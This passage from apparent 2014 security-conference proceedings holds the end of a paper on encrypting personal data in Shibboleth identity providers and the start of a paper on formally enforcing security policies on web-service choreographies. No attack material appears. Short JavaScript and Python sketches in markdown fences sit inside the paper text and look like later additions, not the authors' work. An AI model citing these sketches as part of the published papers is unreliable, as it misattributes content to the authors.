access policies for data stored in the cloud and the absence of
standards to apply such policies, defined not just by users but
also by the countries where data is stored. They proposed a series
of web services that analyze the policies uploaded
with the data before any action is executed. Therefore, once
an application receives a request to process some data, it should
consult the proposed web services to determine whether it can proceed with the
requested action.
TABLE I. PROPERTIES OF WORKS

Publications compared (reference, year): [24] (–), [22] (2010), [8] (2012), [25] (2012), [26] (2012), [7] (2013), and our proposal (2014).
Characteristics compared: use of cryptography, based on reputation, use of policies, awareness of data disclosure, and disclosure support.
Betgé-Brezetz, Kamga, Dupont and Guesmi in [7] combined the reputation approach presented in [25] with the
policies presented in [26]. Their proposal addresses privacy issues
of cloud computing in an end-to-end fashion. It uses sticky
policies with the PDE proposed in [25] to carry
policies and data to the cloud together. The proposal consists in adding,
at cloud service providers, points that evaluate those policies
before using the data; these points are called data protection
modules (DPMs), which guarantee the evaluation of the
defined policies before any processing is done with the data. It
is also defined that the PDE containing the policies and data
is only sent to (and processed, copied and stored in) cloud
nodes that have the DPM modules deployed.
Works [7] and [26] experience the same problem, that is, the
lack of guarantee that a provider is truly obeying the proposed
models. Users have no means to check whether the protection
modules were developed, deployed and are working properly.
Having presented the related works, we can categorize the
presented papers according to the following properties:
•   Use of cryptography – use of cryptography to store
    data at a provider;
•   Based on reputation – use of reputation to back up
    users’ decision about which data is sent to SPs and
    how;
•   Use of policies – policies that regulate how data is
    used/disclosed at a provider;
•   Awareness of data disclosure – feedback is provided to
    make users aware of data dissemination;
•   Disclosure support – means are provided to support users
    when they are disseminating data from an IdP to an SP.
Table I matches the properties shown above with the ones
found in the presented related works. It can be noticed
that our proposal combines the properties found in related
works, striving to enhance support and privacy in identity
providers.
IV. Enhancing privacy on identity providers
This section discusses and presents the issues being
addressed, and then introduces our proposals to tackle those
problems.
A. Privacy issues
There are legislations [14] [15] [16] [17] [18] and guidelines create by Jansen and et al. [27] and Security Alliance in
[28] to address privacy issues that arise in information systems.
Those laws and standards aim to guarantee users rights over
their data. Furthermore, works [7] [8] [22] [24] [25] [26] tried
84
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
to address some of the issues that exist when data is stored out
of users boundaries. However, there are still a lack of models
and mechanisms:
•   Lack of control over users’ PII – users do not have
    effective means to manage their data that is stored in
    identity providers;
•   Disclosure support – as presented in research by
    Zhang et al. in [29], people could not successfully
    define their personal information disclosure policies.
    Therefore, a way should be created to support
    users when they are disseminating PII.
The lack of control that users have over their sensitive data
gets worse once they migrate to cloud services. As presented
by Mather, Kumaraswamy and Latif in [30], once organizations
have migrated to the cloud, they lose control over the structure
used to host their services. Moreover, Zhang et al. discussed in
[31] that this loss of control can lead to data leaks caused by
curious/malicious system administrators of the underlying
structures.
B. Working with privacy in identity providers
Our proposal uses the concepts of privacy described by
Diaz and Gürses [13], striving to minimize data disclosure and
to provide means for users to effectively control personal data
disclosure. Thus, it makes the flow of data more transparent,
providing users with awareness of data dissemination.
In addition, users are responsible for the data entered into IdPs,
which is then used to access services provided by
SPs. Thus, users should have means to properly control data
disclosure, and that process must be made more
transparent for them.
Therefore, we extended the federation framework presented
earlier. On the one hand, we added templates for data dissemination
to support users with PII disclosure. On the other hand, we
used a cryptographic approach to store PII data encrypted in
IdPs.
Our model is presented in Figure 2: users enter their
PII data into IdPs encrypted with some key; therefore,
the disclosure process had to be extended to allow users to
open the data they wish to disseminate. We propose that layer
of protection over the PII data in order to make it harder to
access and disseminate that data without users’ awareness and
consent.
We also created a way in which users can send their
preferences for data dissemination to IdPs, in order to ease
and secure the disclosure process. As pictured in Figure 2,
those preferences are created as policies written in XML;
they would be drawn up by entities such as security labs, privacy
commissioners and security experts, who hold the
knowledge of which data can cause more or less harm to users’
privacy if disclosed.
The process of data dissemination from IdPs to SPs was
extended to use the proposed templates for data dissemination,
supporting users with data disclosure.
Therefore, our proposal adds new objects into the model
of identity management of the Shibboleth framework. Each
object and its role is described as follows:
Figure 2. Enhancing privacy on identity providers.
•   Template data dissemination (TDD) – the template
    which users can obtain from entities they trust,
    customize if needed (as Bob does in Figure 2) and
    enter into IdPs to help manage their PII release.
    It guides users throughout the disclosure process, with
    different granular configurations for different SPs;
•   Cryptography keys – the keys used to encrypt and
    decrypt users’ PII that is stored in the IdP. Users
    encrypt their PIIs with key I before sending them to
    IdPs; during a transaction, when some PII data is
    needed, users are asked to open that data with key II
    in order to disseminate it to an SP.
The following subsections present the extensions that we
developed to make the Shibboleth IdP and its uApprove.jp
plugin cope with our proposals. We divided the work into
addressing the loss of control over users’ PIIs and adding support
to users in the disclosure process.
1) Addressing the loss of control over users’ PIIs: Papers
[7] [31] [26] suggested that there can be curious/malicious
internal entities at providers (SP and IdP) with the privileges and
technical means to harm users’ privacy. Therefore, we propose
to store users’ PIIs in IdPs encrypted in such a way that only the
user can decrypt and use the data.
We did not propose any way to deal with this situation at
the SP side at this moment. On the one hand, as argued
by Chadwick in [19], if the fair principles of data collection
and minimization are followed, the SP will receive just a
pseudonym and some data that by themselves do not give any
hint about the user’s identity. On the other hand, the
IdP concentrates all the sensitive information needed to link
a system user to a person. Furthermore, as presented by De
Capitani di Vimercati, Foresti and Samarati in [9], data per
se is not sensitive; what is sensitive is its association with an
identity.
We developed a tag library using Java Web technologies to
be used as a basic framework to create forms in which users
enter their PII data, as they usually do when creating an
account in some IdP system, as shown in Figure 3. However,
the data sent to the IdP is encrypted with some
key; only the password and the login are not encrypted,
as they are needed to execute the authentication process.
Figure 3. Privacy-enhanced sign-up forms for the IdP: (a) user’s public key; (b) key derivation from passphrase.
Figure 4. User decrypting data to send to the SP: (a) user’s private key; (b) key derivation from passphrase.
The framework we developed gives the following options
to users when asking for a key:
•   Use a public key – the user can choose to enter a
    public key that she/he already has as the key to encrypt
    the PII data, as shown in Figure 3(a);
•   Use a pass-phrase – users can enter a pass-phrase that
    is used to derive a pair of keys, from which we take
    the first one and encrypt their data before sending
    it to the IdP, as depicted in Figure 3(b).
Both of the aforementioned approaches are performed at
the client side; the user’s keys are never sent to the IdP
server. To encrypt the data at the client side we used the
web programming language JavaScript with the libraries Cryptico
[32] and pidCrypt [33], respectively, when users choose
a pass-phrase or a public key to encrypt their data.
Both libraries are based on the JavaScript cryptography library
developed by Wu [34].
Our proposal inserts data into the IdP encrypted. Thereby,
we had to change the flow of messages presented in Figure 1,
since the IdP no longer has users’ PII in clear text.
An extension was needed to enable users to decrypt the data
that is going to be sent to SPs, as pictured in Figure 4.
Whether the user chose to send data encrypted with a pass-phrase or with a public key makes some difference when we
decrypt the PII that needs to be sent to the SP.
On one side, if users selected to encrypt data with a public
key, when decryption is required we ask them for a private
key, as depicted in Figure 4(a). On the other side, if they chose
to encrypt data with a key derived from a pass-phrase, we then
ask for the pass-phrase to derive the keys, and use
the second generated key to decrypt the data, as pictured in
Figure 4(b).
2) Adding support to users at the disclosure process:
Birrell and Schneider discussed in [35] that the control of
PII dissemination can be inconvenient, forcing users to decide which data can be sent to which SP every time they
access a new service. Furthermore, Zhang et al. in [29]
demonstrated that users usually fail to successfully define their
data disclosure policies. Moreover, Hansen, Schwartz and Cooper
in [20] argued that a single default setting would not properly
suit every user’s needs. Therefore, we propose the use of
TDDs based on different user types; this way, we can have
different TDDs, enabling users to customize data disclosure in
a granular way. The TDDs, developed in XML, look like the
document presented in Figure 5.
<?xml version="1.0" encoding="UTF-8"?>
<templateDataDissemination
    xmlns="http://privacy.lrg.ufsc.br/tdd"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://privacy.lrg.ufsc.br/tdd
                        http://privacy.lrg.ufsc.br/tdd-1.0.xsd">
  <spDomain>sp.domain.com</spDomain>
  <spAttributesBehaviours>
    <attributeBehaviour>
      <attributeName>name</attributeName>
      <selectedByDefault>true</selectedByDefault>
    </attributeBehaviour>
    <attributeBehaviour>
      <attributeName>lastName</attributeName>
      <selectedByDefault>true</selectedByDefault>
    </attributeBehaviour>
    <attributeBehaviour>
      <attributeName>email</attributeName>
      <selectedByDefault>false</selectedByDefault>
    </attributeBehaviour>
    <attributeBehaviour>
      <attributeName>SSN</attributeName>
      <selectedByDefault>false</selectedByDefault>
    </attributeBehaviour>
    <attributeBehaviour>
      <!-- Any other attribute defaults to false -->
      <attributeName>*</attributeName>
      <selectedByDefault>false</selectedByDefault>
    </attributeBehaviour>
  </spAttributesBehaviours>
</templateDataDissemination>
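A minimal sketch of how an IdP extension might apply such a TDD at the release page: match the SP domain, then pre-select each attribute from its rule, with `*` as the fallback. The helper names are hypothetical, and for brevity the sketch extracts elements with regular expressions; a real Java-based IdP would use a proper XML parser.

```javascript
// Parse the <attributeBehaviour> entries of a TDD document into a rule map.
function parseTdd(xml) {
  const rules = {};
  const re = /<attributeBehaviour>[\s\S]*?<attributeName>(.*?)<\/attributeName>[\s\S]*?<selectedByDefault>(.*?)<\/selectedByDefault>[\s\S]*?<\/attributeBehaviour>/g;
  let m;
  while ((m = re.exec(xml)) !== null) rules[m[1]] = m[2] === "true";
  const dm = /<spDomain>(.*?)<\/spDomain>/.exec(xml);
  return { spDomain: dm ? dm[1] : null, rules };
}

// Decide which attributes the release page pre-selects for a given SP.
function preselect(tdd, spDomain, attributes) {
  if (tdd.spDomain !== spDomain) return null; // template is not for this SP
  const selected = {};
  for (const attr of attributes) {
    // An explicit rule wins; otherwise fall back to the "*" rule.
    selected[attr] = attr in tdd.rules ? tdd.rules[attr] : (tdd.rules["*"] ?? false);
  }
  return selected;
}

const tddXml = `
<templateDataDissemination>
  <spDomain>sp.domain.com</spDomain>
  <attributeBehaviour><attributeName>name</attributeName><selectedByDefault>true</selectedByDefault></attributeBehaviour>
  <attributeBehaviour><attributeName>SSN</attributeName><selectedByDefault>false</selectedByDefault></attributeBehaviour>
  <attributeBehaviour><attributeName>*</attributeName><selectedByDefault>false</selectedByDefault></attributeBehaviour>
</templateDataDissemination>`;

const tdd = parseTdd(tddXml);
console.log(preselect(tdd, "sp.domain.com", ["name", "SSN", "phone"]));
// { name: true, SSN: false, phone: false }
```

The user can still override any pre-selection on the release page; the TDD only sets safer defaults.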
Figure 5. Example of TDD

Thereby, we extended the Shibboleth IdP to use the TDDs shown above. This way, when users reach the PII disclosure step, they are presented with a page on which the attributes to be disclosed are already selected or deselected.

V. Conclusion

While [8] [25] and [7] [26] tried to manage privacy in the cloud, respectively, by assessing cloud service providers' reputation and by creating sticky policies within data, our proposal tackles the lack of control over users' PIIs in IdPs and the lack of support when disclosing PIIs to SPs, respectively, by encrypting PIIs in IdPs and by using templates for data dissemination to support users when disclosing data.

Our proposal prevents curious and malicious system administrators from gathering users' PII data without permission in IdPs. If an administrator accesses the data repository, he or she will not be able to retrieve any relevant data about a user's identity, since the sensitive information is encrypted.

Furthermore, our proposal is a lightweight extension on top of the Shibboleth identity provider and its uApprove.jp plugin; it works transparently to SPs, since all of the extensions were developed at the IdP. Moreover, once the proposal is deployed, it can prevent the PII data leaks that cause identity theft and the correlation of big data processing with a specific user's identity without his or her consent.

Although this paper focused on tackling some privacy issues in identity providers, there are still issues to be dealt with at the service provider side, such as means to control attributes after they have been released from an IdP to an SP. Our proposal of personas to manage the granular release of users' PIIs aims to lower the risks that arise from the dissemination of certain combinations of attributes. It does not protect privacy by itself; users are still vulnerable to malicious SPs that may collude to profile a user's identity in a federated environment. Therefore, as future work we intend to investigate means to enforce users' privacy at service providers.

As a next step in our research, we will extend the OpenID Connect federation protocol to incorporate our proposals. The OpenID Connect protocol uses JSON instead of SAML (XML), which makes it easier to use in mobile environments, where XML processing can become a problem. We also intend to investigate the use of semantic web technologies in our proposals, to ease the adaptation of already developed systems and to decouple identity management models and protocols from the technology aspect.

Acknowledgment

The research is funded by the Brazilian Funding Authority for Studies and Projects (FINEP) under the Brazilian National Research Network in Security and Cryptography project (RENASIC), and conducted at the virtual laboratory of secure implementations (LATIM) at the Federal University of Santa Catarina (UFSC), in the Networks and Management Laboratory (LRG).

References
[1] P. Hall, "Opportunities for CSPs in enterprise-grade public cloud computing," OVUM, May 2012.
[2] Cloud Industry Forum, "UK cloud adoption and trends for 2013," Tech. Rep., 2013. [Online]. Available: http://cloudindustryforum.org/downloads/whitepapers/cif-white-paper-8-2012-uk-cloud-adoption-and-2013-trends.pdf
[3] S. Srinivasamurthy and D. Liu, "Survey on cloud computing security," in Proc. Conf. on Cloud Computing, CloudCom, vol. 10, 2010.
[4] M. Helft, "After breach, companies warn of e-mail fraud," The New York Times, April 2011, retrieved: February, 2014. [Online]. Available: http://www.nytimes.com/2011/04/05/business/05hack.html
[5] D. Kocieniewski, "Adobe announces security breach," The New York Times, October 2013, retrieved: February, 2014. [Online]. Available: http://www.nytimes.com/2013/10/04/technology/adobe-announces-security-breach.html
[6] C. Sang-Hun, "Theft of data fuels worries in South Korea," The New York Times, January 2014, retrieved: February, 2014. [Online]. Available: http://www.nytimes.com/2014/01/21/business/international/theft-of-data-fuels-worries-in-south-korea.html
[7] S. Betgé-Brezetz, G.-B. Kamga, M.-P. Dupont, and A. Guesmi, "End-to-end privacy policy enforcement in cloud infrastructure," in Proc. 2013 IEEE 2nd International Conference on Cloud Networking (CloudNet). IEEE, 2013, pp. 25–32.
[8] R. Sánchez, F. Almenares, P. Arias, D. Díaz-Sánchez, and A. Marín, "Enhancing privacy and dynamic federation in IdM for consumer cloud computing," IEEE Transactions on Consumer Electronics, vol. 58, no. 1, 2012, pp. 95–103.
[9] S. De Capitani di Vimercati, S. Foresti, and P. Samarati, "Managing and accessing data in the cloud: Privacy risks and approaches," in Proc. 2012 7th International Conference on Risk and Security of Internet and Systems (CRiSIS). IEEE, 2012, pp. 1–9.
[10] C. Landwehr, D. Boneh, J. C. Mitchell, S. M. Bellovin, S. Landau, and M. E. Lesk, "Privacy and cybersecurity: The next 100 years," Proceedings of the IEEE, vol. 100, no. Special Centennial Issue, 2012, pp. 1659–1673.
[11] H. Lauterpacht, "The universal declaration of human rights," Brit. YB Int'l L., vol. 25, 1948, p. 354.
[12] Human Rights Council, "The promotion, protection and enjoyment of human rights on the internet (A/HRC/20/L.13)," 2012, retrieved: February, 2014. [Online]. Available: http://ap.ohchr.org/documents/alldocs.aspx?doc_id=20280
[13] C. Diaz and S. Gürses, "Understanding the landscape of privacy technologies," extended abstract of invited talk, in Proc. Information Security Summit, 2012, pp. 58–63.
[14] E. Directive, "95/46/EC of the European Parliament and of the Council of 24 October 1995 on the protection of individuals with regard to the processing of personal data and on the free movement of such data," Official Journal of the EC, vol. 23, no. 6, 1995, retrieved: February, 2014. [Online]. Available: http://eur-lex.europa.eu/LexUriServ/LexUriServ.do?uri=CELEX:31995L0046:en:HTML
[15] U. S. Congress, "Health Insurance Portability and Accountability Act of 1996," 1996, retrieved: February, 2014. [Online]. Available: http://www.gpo.gov/fdsys/pkg/PLAW-104publ191/html/PLAW-104publ191.htm
[16] U. S. Congress, "Gramm-Leach-Bliley Act," 1999, retrieved: February, 2014. [Online]. Available: http://www.gpo.gov/fdsys/pkg/PLAW-106publ102/html/PLAW-106publ102.htm
[17] U. S. Federal Trade Commission, "Children's Online Privacy Protection Rule," 2013, retrieved: February, 2014. [Online]. Available: http://www.gpo.gov/fdsys/pkg/FR-2013-12-20/html/2013-30293.htm
[18] Casa Civil, "Lei no 12.965, de 23 de abril de 2014," 2014, retrieved: July, 2014. [Online]. Available: http://www.planalto.gov.br/ccivil_03/ato2011-2014/2014/lei/l12965.htm
[19] D. W. Chadwick, "Federated identity management," in Foundations of Security Analysis and Design V. Springer, 2009, pp. 96–120.
[20] M. Hansen, A. Schwartz, and A. Cooper, "Privacy and identity management," IEEE Security & Privacy, vol. 6, no. 2, 2008, pp. 38–45.
[21] E. Bertino and K. Takahashi, Identity Management: Concepts, Technologies, and Systems. Artech House, 2011.
[22] T. Orawiwattanakul, K. Yamaji, M. Nakamura, T. Kataoka, and N. Sonehara, "User-controlled privacy protection with attribute-filter mechanism for a federated SSO environment using Shibboleth," in Proc. 2010 International Conference on P2P, Parallel, Grid, Cloud and Internet Computing (3PGCIC). IEEE, 2010, pp. 243–249.
[23] Shibboleth, "What's Shibboleth?" retrieved: July, 2014. [Online]. Available: https://shibboleth.net/about/
[24] SWITCH, "uApprove – user consent module for Shibboleth identity providers," retrieved: June, 2014. [Online]. Available: https://www.switch.ch/aai/support/tools/uApprove.html
[25] S. Betgé-Brezetz, G.-B. Kamga, M. Ghorbel, and M.-P. Dupont, "Privacy control in the cloud based on multilevel policy enforcement," in Proc. 2012 IEEE 1st International Conference on Cloud Networking (CLOUDNET). IEEE, 2012, pp. 167–169.
[26] D. W. Chadwick and K. Fatema, "A privacy preserving authorisation system for the cloud," Journal of Computer and System Sciences, vol. 78, no. 5, 2012, pp. 1359–1373.
[27] W. Jansen, T. Grance et al., "Guidelines on security and privacy in public cloud computing," NIST Special Publication 800-144, 2011.
[28] Cloud Security Alliance, "Security guidance for critical areas of focus in cloud computing v3.0," Cloud Security Alliance, 2011.
[29] Q. Zhang, Y. Qi, J. Zhao, D. Hou, T. Zhao, and L. Liu, "A study on context-aware privacy protection for personal information," in Proc. 16th International Conference on Computer Communications and Networks (ICCCN 2007). IEEE, 2007, pp. 1351–1358.
[30] T. Mather, S. Kumaraswamy, and S. Latif, Cloud Security and Privacy: An Enterprise Perspective on Risks and Compliance. O'Reilly Media, Inc., 2009.
[31] W. Han-zhang and H. Liu-sheng, "An improved trusted cloud computing platform model based on DAA and privacy CA scheme," in Proc. 2010 International Conference on Computer Application and System Modeling (ICCASM), vol. 13, Oct 2010, pp. V13-33–V13-39.
[32] R. Terrell, "An easy-to-use encryption system utilizing RSA and AES for JavaScript," 2012, retrieved: May, 2014. [Online]. Available: https://github.com/wwwtyro/cryptico
[33] Pidder, "pidCrypt – a JavaScript crypto library," retrieved: May, 2014. [Online]. Available: https://www.pidder.de/pidcrypt/
[34] T. Wu, "RSA and ECC in JavaScript," 2009, retrieved: May, 2014. [Online]. Available: http://www-cs-students.stanford.edu/~tjw/jsbn/
[35] E. Birrell and F. B. Schneider, "Federated identity management systems: A privacy-based characterization," IEEE Security & Privacy, vol. 11, no. 5, 2013, pp. 36–48.
Enforcing Security Policies on Choreographed Services using Rewriting Techniques
Karim Dahmani
Mahjoub Langar
karim.dahmani@fst.rnu.tn
mahjoub.langar@ift.ulaval.ca
LIP2 Research Laboratory
Faculté des Sciences de Tunis
Tunis, Tunisia
Abstract—This paper presents an automated formal approach for enforcing security policies on a choreography of Web services. We take as input a formal description of a choreography of Web services and a security property represented by a process; we then define rewriting rules and rewrite the two processes in order to make them synchronize on each communication action. This approach produces as output a secure version of the concerned Web service, which behaves like the original one but does not violate the security property.
Keywords-Web Service Composition Security; Instrumentation; Choreography; Formal Verification; End-Point Calculus.

I. INTRODUCTION
Web Services (WS) are distributed and modular
applications that communicate by message passing in order
to complete specific activities. Composition of WS consists
in combining different WS to provide value-added services.
WS composition rules deal with how different services are
composed into a coherent global service. In particular, they
specify the order in which services are invoked, and the
conditions under which a certain service may or may not be
invoked. Among the approaches investigated in service
composition, we distinguish orchestration and choreography.
Orchestration composes the available services and adds a central coordinator (the orchestrator), which is responsible for invoking and composing the individual sub-activities. In contrast, the second approach, referred to as WS choreography, does not assume the exploitation of a central coordinator but rather defines complex tasks via the definition of the conversation that should be undertaken by each participant. Several proposals exist for orchestration and choreography languages, such as the Business Process Execution Language (BPEL) [1] for orchestration and the Web Service Choreography Description Language (WS-CDL) [2] for choreography. Since the orchestration technique uses a central coordinator that composes the available services, enforcing security policies on it seems trivial; hence, the technique used in this paper for composing WS is choreography. One of
the main challenges for researchers in this domain is the formalization of these composition languages. Several contributions that formalize WS-CDL have been developed in the last decade, such as the Global Calculus (GC) and the End-Point Calculus (EPC) proposed by Carbone et al. [3], the choreography language proposed by N. Busi et al. [4], the choreography description language proposed by H. Yang et al. [12], and the timed automata approach proposed by G. Diaz et al. [5]. The formal specification language used in this paper is the End-Point Calculus introduced by Carbone et al. [3]. One of the reasons behind this choice is that the End-Point Calculus is a modified version of the pi-calculus, so its syntax is more familiar and its expressivity is stronger.
The need for secure WS composition has attracted great interest from researchers in the last decade. In this paper, we propose an automated formal approach for the enforcement of security policies on choreographed services. We take as input a formal description of the behavior of a participant in a choreography and a security property. We define rewriting rules that add special actions to processes and security properties in order to ensure synchronization and consequently control the evolution of the behavior of a participant.
This paper is structured as follows: in Section II, we introduce the choreography specification language used in this work. In Section III, we present the security property specification language. Section IV deals with the enforcement approach. The proof of this approach is given in Section V. Related work is discussed in Section VI, and conclusion and future work are in Section VII.

II. CHOREOGRAPHY SPECIFICATION LANGUAGE
Carbone et al. [3] have proposed a formal language for specifying a choreography of WS: the GC. It describes behaviors of WS from a global viewpoint and is distilled from WS-CDL. Carbone et al. [3] have also proposed a second formal language, the EPC, which specifies behaviors of WS from a local viewpoint. Finally, a projection from GC to EPC under some assumptions, called the End-Point Projection (EPP), has been proposed by Carbone et al. [3]. The language adopted in this paper for formally specifying processes and security properties is EPC.
A. Syntax of the End-Point Calculus

EPC describes the behavior of each participant in the choreography from its end-point view. EPC is a variant of the pi-calculus augmented with the notion of participants and their local states. We present hereafter the syntax and formal semantics of EPC, where P, Q range over processes, ch ranges over service channels, s ranges over session channels, opᵢ ranges over operator names, x ranges over variables, e ranges over expressions and X ranges over term variables.
P ::= !ch(s̃).P ∣ ch(ν s̃).P ∣ s▹Σᵢ opᵢ(xᵢ).Pᵢ ∣ s◃op(e).P ∣ x:=e.P
    ∣ P⊕Q ∣ P∣Q ∣ if e then P else Q ∣ (ν s)P ∣ rec X.P ∣ 0
• !ch(s̃).P and ch(ν s̃).P represent session initiation; !ch(s̃).P is used for input and ch(ν s̃).P for output. !ch(s̃).P says that the service channel ch, which is publicly available, is ready to receive an unbounded number of invocations, offering a communication via its freshly generated session channels s ∈ s̃. ch(ν s̃).P is an invocation of a service located at the service channel ch and an initiation of a communication session that will occur through the session channels s ∈ s̃. After a session has been initiated between two participants and freshly generated session channels have been shared between them, they can communicate via these channels using the communication constructs.
• s▹Σᵢ opᵢ(xᵢ).Pᵢ is an offer of one of the operators opᵢ and a reception of an expression e through the session channel s, which will be evaluated and stored in the local variable xᵢ. A participant having this behavior will receive an invocation of one of its operator names opᵢ together with an expression e; the value of e is saved in its local variable xᵢ. For instance, a seller service receives a confirmation or a cancellation for a purchase: s▹confirmPurchase(x₁).P + s▹cancelPurchase(x₂).0
• s◃op(e).P sends the expression e and invokes the operator op through the session channel s. For instance, a buyer service requests a quote of a chosen product from a seller through the channel s: s◃quoteRequest(e_product).P. In addition, operator names op₁, op₂, ... are invoked by a message sender or offered by a message receiver. Operator names in in-session communications are analogous to methods in objects [3].
• x:=e.P is the assignment operator. It is a local operation: it assigns the result of the evaluation of the expression e to the variable x. For example, the buyer assigns to its variable x_quote the value of the quote received from the seller: x_quote := e_quote.P
• if e then P else Q is a choice based on the evaluation of the boolean expression e. For example, the buyer accepts the quote if it is under 1000: if e_quote < 1000 then s◃accept(e_quote).P else s◃reject(e_quote).0
• P⊕Q is the non-deterministic choice. When the choice of the buyer is arbitrary, it would be written as: s◃accept(e_quote).P ⊕ s◃reject(e_quote).0
• P∣Q is the parallel composition of processes. For example, a seller that offers his service to buyers should have his service running in parallel for new requesters: !ch_seller(s).P ∣ P' ∣ P'' ∣ ..., where P', P'', ... are processes dealing with different buyers.
• (ν s)P expresses the fact that the session channel s is local to P. It is used to restrict a session channel to be used only between the two participants that communicate through it.
• rec X.P is the recursion operator used to express repetitive behaviors. For example, a participant having the following behavior will always request quotes until he receives an acceptance: rec X. s◃quoteRequest(e).(s▹accept.P ⊕ s▹reject.X)
• Finally, 0 is the inaction.
Processes are located within participants. Participants and their composition are called networks (written N, M, ...), whose grammar is given by:

N ::= A[P]σ ∣ N∣M ∣ (ν s)N ∣ ε

For more details about the syntax of EPC, the reader can refer to [3].
B. Semantics of the End-Point Calculus

In order to minimize the number of reduction rules, we define ≡ as the least congruence generated from:

P∣0 ≡ P
P∣Q ≡ Q∣P
(P∣Q)∣R ≡ P∣(Q∣R)
P⊕P ≡ P
P⊕Q ≡ Q⊕P
(P⊕Q)⊕R ≡ P⊕(Q⊕R)
(ν s)0 ≡ 0
(ν s₁)(ν s₂)P ≡ (ν s₂)(ν s₁)P
((ν s)P)∣Q ≡ (ν s)(P∣Q)   (s ∉ fn(Q))
A[P]σ ≡ A[Q]σ   (P ≡ Q)
A[(ν s)P]σ ≡ (ν s)(A[P]σ)
M∣ε ≡ M
M∣N ≡ N∣M
(M∣N)∣L ≡ M∣(N∣L)
(ν s)ε ≡ ε
(ν s₁)(ν s₂)M ≡ (ν s₂)(ν s₁)M
((ν s)M)∣N ≡ (ν s)(M∣N)   (s ∉ fn(N))

The operational semantics of EPC are given in Figure 1.
• Init shows how two participants initiate a session by sharing freshly generated session channels s̃. These session channels are restricted to participants A and B using the binding operator ν.
• Comm explains how a communication is established between two participants: when B invokes the operator op_j, which is offered by A, and sends the expression e_j, which will be evaluated to a value v at A, then A receives it and assigns v to its local variable x_j.
• Assign is a local operation. The assignment rule evaluates an expression e and assigns the result of this evaluation to the variable x in A; then A behaves as P.
• IfThenElse evaluates the boolean expression e and, according to the result of this evaluation, behaves either as P₁ or as P₂.
• Par shows the behavior of two concurrent processes.
• Sum shows the alternative choice behavior.
• Rec says that if the process P, within which we replace each occurrence of X by rec X.P, behaves as P', then rec X.P will behave as P'.
• Res restricts the use of the session channels s̃ to the process P in A.
Finally, the rule Struct-NW says that we take reductions up to structural equivalence: if M ≡ M', M' → N', and N' ≡ N, then M → N.
C. Example
We consider a simplified version of a travel reservation system. The scenario involves three participants: a traveler, a travel agent and an airline reservation system. The traveler is planning a trip. Once the traveler selects a trip, he submits his choice to the travel agent. The travel agent checks seat availability with the airline reservation system and sends back either a trip cancellation or a validation. The traveler then reserves tickets for this trip by sending payment details to the travel agent. The travel agent must now verify seat availability one more time. If seats are still available, the airline reservation system accepts the payment details and sends the tickets of the trip back to the travel agent. The travel agent responds to the traveler either with the tickets of the trip or by canceling the reservation.
The behavior of the traveler is given in EPC by:

ch_TA(ν s). s▹ack. s◃orderTrip(e₁).
(s▹cancel.0 ⊕ s▹available(x₁). s◃book(e₂).
(s▹cancelBook.0 ⊕ s▹tickets(x₂).0))

The traveler starts by opening a session with the travel agent through the public service channel ch_TA and initiates a communication channel s through which the communication between the traveler and the travel agent will occur. Then, the traveler receives through s an acknowledgment message s▹ack. After that, the traveler sends a trip order s◃orderTrip(e₁), where the expression e₁ contains details about the chosen trip. At this point, there are two scenarios: the traveler either receives a cancel request s▹cancel when there are no available seats, or an available message s▹available(x₁) containing details of the trip. In the latter case, the traveler may book the flight with s◃book(e₂). Finally, the traveler receives a tickets message s▹tickets(x₂) if the transaction has succeeded; otherwise he will receive a cancelBook message.
The behavior of the travel agent is given by:

!ch_TA(s). s◃ack. s▹orderTrip(x₁).
ch_A(ν s'). s'▹ack. s'◃checkSeat(e₁).
(s'▹noSeats. s◃cancel.0 ⊕
s'▹seatsOK(x₂). s◃available(e₂). s▹book(x₃).
s'◃reserve(e₃).
(s'▹reserved(x₄). s◃tickets(e₄).0 ⊕
s'▹notReserved(x₅). s◃cancelBook.0))

The travel agent offers his service through ch_TA by providing a communication channel s. Once his service is invoked, he sends an acknowledgment message, receives a trip order, and then contacts the airline service through its public service channel ch_A. The communication between the airline service and the travel agent occurs through the session channel s'. The travel agent looks for available seats with s'◃checkSeat(e₁). If there are no available seats, he receives a noSeats message s'▹noSeats and sends a cancel message s◃cancel to the traveler. Otherwise, he receives a seatsOK message s'▹seatsOK(x₂) and sends an available message s◃available(e₂) to the traveler. After that, the travel agent receives a book message s▹book(x₃) from the traveler and proceeds to the flight reservation s'◃reserve(e₃). Depending on seat availability, he receives either a confirmation message s'▹reserved(x₄) or a notReserved message s'▹notReserved(x₅). In the first case, he sends the tickets s◃tickets(e₄) to the traveler; otherwise he sends a booking cancellation s◃cancelBook.
The behavior of the airline is given by:

!ch_A(s'). s'◃ack. s'▹checkSeat(x₁).
if available(x₁) then s'◃seatsOK(e₁).
s'▹reserve(x₂). if available(x₂) then
s'◃reserved(e₂).0 else
s'◃notReserved(e₃).0
else s'◃noSeats.0

The airline offers its service through the service channel ch_A. Once its service is invoked, it sends an acknowledgment message. Then, it receives a checkSeat request. Subject to availability, it responds with a seatsOK or a noSeats message. In the first case, it may receive a seat booking request s'▹reserve(x₂). At this stage, the airline service checks seat availability one more time before finalizing the process by sending either a reserved message s'◃reserved(e₂) or a notReserved message s'◃notReserved(e₃).
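The happy path of this choreography can be sanity-checked mechanically: the sends of each participant on a session channel must mirror the receives of its peer. The following is an illustrative Python sketch with our own trace encoding (a triple of channel, direction and operator; '!' marks a send, '?' a receive), not an implementation of EPC:

```python
# Happy-path traces of the three participants, with operator names taken
# from the EPC terms above.
TRAVELER = [("s", "?", "ack"), ("s", "!", "orderTrip"), ("s", "?", "available"),
            ("s", "!", "book"), ("s", "?", "tickets")]
AGENT    = [("s", "!", "ack"), ("s", "?", "orderTrip"),
            ("s'", "?", "ack"), ("s'", "!", "checkSeat"), ("s'", "?", "seatsOK"),
            ("s", "!", "available"), ("s", "?", "book"),
            ("s'", "!", "reserve"), ("s'", "?", "reserved"), ("s", "!", "tickets")]
AIRLINE  = [("s'", "!", "ack"), ("s'", "?", "checkSeat"), ("s'", "!", "seatsOK"),
            ("s'", "?", "reserve"), ("s'", "!", "reserved")]

def complementary(trace_a, trace_b, channel):
    """Sends of one participant on `channel` must mirror receives of the other."""
    a = [(d, op) for c, d, op in trace_a if c == channel]
    b = [({"!": "?", "?": "!"}[d], op) for c, d, op in trace_b if c == channel]
    return a == b

assert complementary(TRAVELER, AGENT, "s")
assert complementary(AGENT, AIRLINE, "s'")
print("happy-path traces are complementary")
```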
